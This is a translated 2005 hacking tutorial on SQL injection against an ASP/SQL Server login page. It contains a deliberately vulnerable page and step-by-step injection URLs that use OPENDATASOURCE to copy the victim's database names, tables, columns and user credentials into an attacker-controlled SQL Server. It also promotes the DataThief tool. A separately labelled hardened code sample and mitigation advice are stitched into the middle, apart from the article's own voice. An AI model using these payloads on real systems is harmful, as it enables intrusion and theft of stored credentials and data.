myhack58 (佚名 / Anonymous) MYHACK58:6220055268
History: Dec 10, 2005 - 12:00 a.m.

Replacing NBSI2: the Opendatasource and Openrowset vulnerability warning (Black Bar Safety Net)

2005-12-10 00:00:00
Anonymous
www.myhack58.com

There are many SQL injection tools on the market today, and the most respected is NBSI2. SQL injection methods are all over the Internet; anyone who studies them seriously will soon become a script-kiddie "master". But whether it is a tool or one of the countless methods, the principle used to guess SQL data comes down to two kinds: one uses the SQL error messages that leak out when the target web server has not turned off error reporting; the other, when the target web server has turned error messages off, uses ASCII-code bisection (half-split) analysis. When error messages are off, guessing data is very slow; when it crawls at a snail's pace it is really maddening, and at that point NBSI2 often pops up a "guess failed, retry?" warning dialog, which is a nuisance. But with the two functions Opendatasource and Openrowset, all of this can be resolved.
SQL Server Books Online explains that an OLE DB data source that is not defined as a linked server name and is not accessed regularly in queries is referenced by a special name. In SQL Server 2000, the Openrowset and Opendatasource functions supply the connection information needed to access data from OLE DB data sources. Openrowset and Opendatasource should only be used to reference OLE DB data sources that are not accessed regularly; for data sources that need regular access, you should define a linked server. Neither Opendatasource nor Openrowset provides all the functionality of a linked server definition, including security management and querying catalog information. Every call to these functions must supply all of the connection information, including the password. Put simply, these two functions perform distributed queries without depending on a linked server.
Tools that use the Openrowset function to pull information straight out of the injected database already exist, so I won't explain that in detail by hand; at the end of the article I will briefly introduce such a tool. Here I focus on the use of Opendatasource. The usage example for Opendatasource in Books Online has the following format:

SELECT *
FROM Opendatasource(
'SQLOLEDB',
'Data Source=ServerName;User ID=MyUID;Password=MyPass'
).Northwind.dbo.Categories

With this statement we can obtain the database names, table names, column names and field values: all of the information. If you still don't follow, watch my demonstration.
I built a test environment on the server 192.168.8.10 and wrote a vulnerable ASP page. There are two pieces of code; e.asp is as follows:
<form action=f.asp method=get>
Account lcx<br>
Password<input type=text size=100 name=password>
<input type=submit value=submit>
</form>
The code of f.asp is as follows:

<%
strSQLServerName = "127.0.0.1"
strSQLDBUserName = "sa"
strSQLDBPassword = "lcx"
strSQLDBName = "bbsuser"
Set conn = Server.CreateObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
sql2 = "select * from bbsuser where username='admin' and password='" & request("password") & "'"
set rs2 = conn.execute(sql2)
%>
<br>
<%="The executed SQL statement is: " & sql2%>
<%
rs2.close
set rs2 = nothing
conn.close
set conn = nothing
%>
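The defect in f.asp above is that request("password") is spliced straight into the SQL text, which is what lets a submitted value become an extra statement. Below is a hardened version of the same page, an added example rather than the article's code; the login bbs_app and its password are placeholders for a low-privilege application account.

```asp
<%
' Added example (not the article's code): f.asp with the password bound as a
' query parameter. Whatever is submitted is compared as a literal string and can
' no longer append statements to the query.
' bbs_app / <app-password> are placeholders for a low-privilege login (not sa).
Dim conn, cmd, rs
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "Provider=SQLOLEDB.1;Persist Security Info=False;Server=127.0.0.1;" & _
          "User ID=bbs_app;Password=<app-password>;Database=bbsuser;"

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = 1   ' adCmdText: CommandText is a plain SQL statement
cmd.CommandText = "select username from bbsuser where username = ? and password = ?"

' CreateParameter(name, type, direction, size, value)
' 200 = adVarChar, 1 = adParamInput; CStr() avoids an Empty value when the
' parameter is missing from the request.
cmd.Parameters.Append cmd.CreateParameter("username", 200, 1, 255, "admin")
cmd.Parameters.Append cmd.CreateParameter("password", 200, 1, 255, CStr(Request("password")))

Set rs = cmd.Execute
If rs.EOF Then
    Response.Write "Login failed."
Else
    Response.Write "Login OK."
End If

' The SQL text is deliberately not echoed back: the original page printed the
' executed statement, which on its own tells a visitor how the query is built.
rs.Close
Set rs = Nothing
conn.Close
Set conn = Nothing
%>
```

Parameter binding removes the injection itself; independently of that, on SQL Server 2005 and later Opendatasource and Openrowset are unavailable to every login unless the server's "Ad Hoc Distributed Queries" option has been turned on, and the application login should not be sa.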

When "1' and db_name()>0" is submitted in the text box, the result is as shown in the figure.
On another server, 192.168.8.20, I installed SQL Server with the sa password set to lcx. Because the Opendatasource function works over TCP, you must make sure that port 1433 on 192.168.8.20 is reachable from 192.168.8.10. OK, the test environment is complete; now let's look at how the intrusion works.

Tip: if SQL Server SP2 is installed with the defaults on Windows XP SP2, port 1433 will not be reachable from outside; keep this in mind and apply the SP3 patch.

Step one: get all the database names
We start by creating the database and tables on 192.168.8.20. If you prefer the Enterprise Manager GUI I have no objection; I wrote the statements directly in Query Analyzer:
create database lcx
CREATE TABLE ku(name nvarchar(256) null);
CREATE TABLE biao(id int NULL,name nvarchar(256) null);
So we have created a database lcx with two tables, ku and biao. Table ku holds one column, name, of type nvarchar(256); table biao holds two columns, id of type int and name of type nvarchar(256). The database, table and column names here are arbitrary; just make sure the types are right.
Let's review the SQL statement that lists all database names: "select name from master.dbo.sysdatabases". If you still don't understand this statement, go and do some cramming. We use the following statement to get the names of all databases on the 192.168.8.10 server:
insert into opendatasource('sqloledb','server=192.168.8.20;uid=sa;pwd=lcx;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases--
In our test environment that is:
http://192.168.8.10/web/f.asp?password=1'insert into opendatasource('sqloledb','server=192.168.8.20;uid=sa;pwd=lcx;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases--

Now go to the SQL Server on 192.168.8.20 and look at the table ku: you will be surprised to find all of the other side's database names neatly lined up.
Many people may also worry about permissions here. I can responsibly tell you that even the Public role can use the Opendatasource function.
We have all the databases, but how do we know which one is the current one? Ha, just change the statement, right? Change it to the following:
insert into opendatasource('sqloledb','server=192.168.8.20;uid=sa;pwd=lcx;database=lcx').lcx.dbo.ku select db_name(0)--

Can it? In Figure 4, bbsuser is the current database of our injection point. Next we get all the table names in the current database.
Step two: get all the table names in the current database
Statement:
insert into opendatasource('sqloledb','server=192.168.8.20;uid=sa;pwd=lcx;database=lcx').lcx.dbo.biao select [id],[name] from sysobjects where xtype='U'--
This statement omits the database name, so it gives all the table names in the current database. You can also write the statement as:
insert into opendatasource('sqloledb','server=192.168.8.20;uid=sa;pwd=lcx;database=lcx').lcx.dbo.biao select [id],[name] from bbsuser.dbo.sysobjects where xtype='U'--
Let's run the next test.
Now go to 192.168.8.20 and look at the data in lcx.dbo.biao. What do you see?
Haven't we already got all the table names in the current database? Eager learners will surely ask: then how do I get all the table names in another database? Very simple; the basic statement has the following format:
insert into opendatasource('sqloledb','server=192.168.8.20;uid=sa;pwd=lcx;database=lcx').lcx.dbo.biao select [id],[name] from <database name>.dbo.sysobjects where xtype='U'--
The database name here is one we already guessed in step one.
Step three: get the column names
Did you see that the first table name we got is bbsuser, and that its id value is 357576312? With these two pieces of information we can obtain the column names. Before getting the column names, we first do some preparation on 192.168.8.20: copy the structure of a system table. In the lcx database I created earlier, execute the statement:
select * into [tmpcolumns] from syscolumns where 1=2
This copies the structure of the system table syscolumns into [tmpcolumns].
We want all the column names of the table bbsuser; since its id value is 357576312, our statement is:
insert into opendatasource('sqloledb','server=192.168.8.20;uid=sa;pwd=lcx;database=lcx').lcx.dbo.tmpcolumns select * from syscolumns where id=357576312--

Then go back to 192.168.8.20 and look at what the table lcx.dbo.tmpcolumns now contains.
See? We got all the column names of bbsuser, along with some other information about them. That other information is also useful to us; it prepares the next step, getting the field values. Here I only explain what two of the columns mean: length is the length of the column you obtained, and xtype is its type. You may ask why the types come out as numbers such as 56 and 175. I looked up the correspondence between the numbers and the types; the mapping is as follows:
when 34 then 'image'
when 35 then 'text'
when 52 then 'smallint'
when 56 then 'int'
when 61 then 'datetime'
when 62 then 'float'
when 108 then 'numeric'
when 167 then 'varchar'
when 175 then 'char'
when 231 then 'nvarchar'
Step four: get the field values
With the current database name, table names and column names of the injected database, we can obtain the field values. Based on the information obtained, we start by creating a new table bbsuser in the lcx database on 192.168.8.20, with the columns id (type int, length 4), username (type char, length 10) and password (type char, length 10). If you don't understand this step, look again at the table of numbers and types. I created it in Enterprise Manager on 192.168.8.20.
Getting all the information in the injected database's current database is now down to one step; the injected statement is as follows:
insert into opendatasource('sqloledb','server=192.168.8.20;uid=sa;pwd=lcx;database=lcx').lcx.dbo.bbsuser select * from [bbsuser]--
Executed at the injection point it is:
http://192.168.8.10/web/f.asp?password=1'insert into opendatasource('sqloledb','server=192.168.8.20;uid=sa;pwd=lcx;database=lcx').lcx.dbo.bbsuser select * from [bbsuser]--
Let's see whether it succeeded: go to 192.168.8.20 and take a screenshot of lcx.dbo.bbsuser. Naturally it succeeded.
Small tip: when getting the field values, the table and column names you create don't have to be exactly the same as those in the injected database; as long as the types match, it works.

So step by step we have moved all the information in the injection point's current database to our own machine. You may say my method is good, but it is still not as cool as a tool. I haven't yet seen a tool that uses Opendatasource to get injection information, but I have found one that uses Openrowset. Below I briefly introduce its usage.
The tool was written by a foreigner; its name is DataThiefV1.0.exe. Its running interface is shown in the figure.
As before, I want to inject http://192.168.8.10/web/f.asp?password=1 in the environment built above.

Tip: if the injected parameter is a character type, write the URL as http://192.168.8.10/web/f.asp?password=1';<>, with a single quote. If it is a numeric type, write http://192.168.8.10/web/f.asp?password=1;<>, without the single quote.

Click GO, and the information comes back really fast, probably because I'm testing on my internal network, heh.
If you don't understand the Openrowset function, capture the traffic and analyze it yourself; I won't go on about it. Finally, I hope this article gives everyone one more idea and some inspiration for injection methods, and that on this basis you explore the usage of Opendatasource and Openrowset further.